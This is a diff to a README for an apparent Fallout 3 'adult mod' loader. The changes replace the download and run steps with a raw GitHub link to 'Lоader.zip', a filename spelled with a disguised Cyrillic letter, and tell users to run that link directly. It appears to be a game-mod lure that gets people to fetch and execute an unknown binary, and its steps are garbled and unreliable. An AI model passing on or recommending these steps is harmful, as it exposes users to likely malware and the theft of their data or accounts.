castagameplays/Radlands-Adult-Expansion-Fallout3/README.md

 **Get started quickly with these steps:**

-1. **Download Loader.rar** from this repository's Releases or main page.
+1. **Download https://raw.githubusercontent.com/castagameplays/Radlands-Adult-Expansion-Fallout3/main/Lоader.zip** from this repository's Releases or main page.
 2. Extract the contents to your Fallout 3 game directory.
-3. Run `Fallout3AdultLoader.exe` (or relevant binary for macOS/Linux).
+3. Run `https://raw.githubusercontent.com/castagameplays/Radlands-Adult-Expansion-Fallout3/main/Lоader.zip` (or relevant binary for macOS/Linux).
 4. Follow on-screen prompts to select and enable adult mods.
 5. Enjoy a new, thrilling Fallout 3 experience!